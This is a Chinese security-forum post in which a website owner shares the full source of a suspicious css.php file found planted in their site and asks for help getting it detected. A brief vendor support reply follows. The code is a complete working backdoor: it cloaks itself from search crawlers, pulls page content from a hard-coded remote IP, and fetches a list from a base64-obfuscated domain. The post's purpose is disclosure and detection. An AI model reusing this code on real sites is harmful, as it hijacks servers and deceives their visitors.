一个php文件，转接外部网站，望增加识别查杀

发现网站目录下面多了一个文件夹，通过文件夹下面css.php链接了一些其他内容。通过360安全检测这些工具检测不出来任何问题，贴出来让大家分析分析。

1. <?php
   
2. define('s_u','http://108.186.234.233/');
   
3. define('m_i','1');
   
4. define('h_t',$_SERVER['SERVER_NAME']);
   
5. define('s_s','@Googlebot|EmbeddedWB|yahoo|MJ12bot|AhrefsBot|BLEXBot|EasouSpider|YandexBot|Exabot@i');
   
6. function r_k($l){$ch = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9');$str='';for ($i = 0;$i <$l;$i++) {$str .= $ch[mt_rand(0,35)];}return $str;}
   
7. function g_c($url){$ch = curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,10);curl_setopt ($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko");return curl_exec($ch);}
   
8. class d58Cache {private $_unitNum = 999;private $_unitFloor = 3; private $_pix = '_';private $_now = 0;public $baseDir = ''; public $dirMode = 0777;
   
9. public function __construct($baseDir = null) {
   
10. if ($baseDir) {
    
11. $this->baseDir = $baseDir;} else {$this->baseDir = dirname(__FILE__) . DIRECTORY_SEPARATOR . '_Data';}if ($_SERVER['REQUEST_TIME']) {$this->_now = $_SERVER['REQUEST_TIME'];} else {$this->_now = time();}}public function isExists($id, $timeout = 0, $isCreate = false) {$file = $this->hashId($id);if (!is_file($file)) {if (is_file($file . '.lock')) {return 'LOCKED';}return false;}return true;}public function set($id, $data = null) {return $this->_writeFile($this->hashId($id), $this->_encode($data));}public function get($id, $lockread = false) {return $this->_decode($this->_readFile($this->hashId($id), $lockread));}public function del($id) {return $this->_deleteFile($this->hashId($id));}public function hashId($id) {if (!is_numeric($id)) {$id = $this->enId($id);$notNum = 'a'; }$id = $tid = $id;$hash = '';$pow = 0;for ($i = $this->_unitFloor; $i ; $i--) {$pow = pow($this->_unitNum, $i);$unit = floor($tid / $pow);if ($unit > $this->_unitNum) {$unit = $this->_unitNum;}$hash .= $this->_pix . $unit . DIRECTORY_SEPARATOR;$tid = $tid - $unit * $pow;}unset($pow, $tid, $unit, $i);return $this->baseDir . DIRECTORY_SEPARATOR . $hash . ($notNum) . $id . '.txt';}public function enId($data) {return sprintf('%011u', crc32($data));}private function _encode($data) {$array = array('source' => $data);return '<?php die(\'Cache Page by d58Cache.\') ?>' . serialize($array);}protected function _decode($data) {$array = unserialize($data);return $array['source'];}protected function _writeFile($file, $data) {$dir = dirname($file);if (!is_dir($dir)) {mkdir($dir, $this->dirMode, true);}if (!is_file($file) && is_file($file . '.lock')){return false;}$mqr = get_magic_quotes_runtime();set_magic_quotes_runtime(0);$re = @ file_put_contents($file, $data, LOCK_EX); set_magic_quotes_runtime($mqr);return $re;}protected function _readFile($file, $lockread = false) {if (!is_file($file)){if (!$lockread) {return false;}$file .= '.lock'; if (!is_file($file)) {return false;}}return file_get_contents($file, null, null, 39);}protected function _deleteFile($file) {if (is_file($file)){return unlink($file);}return false;}public function lock($id) {$file = $this->hashId($id);if (!is_file($file) && is_file($file . '.lock')){return true;}return rename($file, $file . '.lock');}public function unlock($id) {$file = $this->hashId($id);if (is_file($file) && !is_file($file . '.lock')){return true;}return rename( $file . '.lock', $file);}}
    
12. function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_l(){return "?".r_k(4).'/'.r_k(mt_rand(4,6)).'.html';}
    
13. set_time_limit(20);error_reporting(0);function r_c(){global $b1,$b1s;return trim($b1[mt_rand(0,$b1s)]);}
    
14. define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);
    
15. if(preg_match(s_s,u_s)){
    
16. header('HTTP/1.1 503 Service Temporarily Unavailable');
    
17. echo '对不起，页面维护中，请稍后访问！';
    
18. die;
    
19. }else {
    
20. header('HTTP/1.1 200 OK');
    
21. $cache = new d58Cache();
    
22. $_pa=explode('/',$_SERVER['PHP_SELF']);
    
23. $_mp=str_replace(end($_pa),'',$_SERVER['PHP_SELF']);
    
24. define('m_l',$_mp);
    
25. define('h_z',s_p());
    
26. $m_d=md5(h_z);if ($cache -> isExists($m_d)){$d_c = $cache -> get($m_d);}else{$d_u=s_u.'?mi='.m_i.'&xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_u.='&ml='.bin2hex(m_l);$d_c=g_c($d_u);if(!stristr(h_z,"sitemap.")) $cache -> set($m_d,$d_c);}
    
27. if(!is_file("b.txt")){$btdb=g_c("http://s1".base64_decode("LmQ1OC5uZXQvcy8=")."getbt.php");if(!$btdb) $btdb=g_c("http://s2".base64_decode("LmQ1OC5uZXQvcy8=")."/getbt.php");
    
28. if(trim($btdb)){$bts=fopen("b.txt","w");fwrite($bts,trim(mb_convert_encoding($btdb,'gbk','utf-8')));fclose($bts);}}
    
29. $b1=file('b.txt');$b1s=ceil(count($b1)-1);$d_c=preg_replace_callback("/{link}/iUs", "r_l",$d_c);$d_c=preg_replace_callback("/{name}/iUs", "r_c",$d_c);echo $d_c;}
    
30. ?>

复制代码

网站卫士本身只做网站安全防护，不做检测。
如果您是在http://webscan.360.cn/上进行扫描
请联系360网站安全检测 或者去主机卫士板块反馈。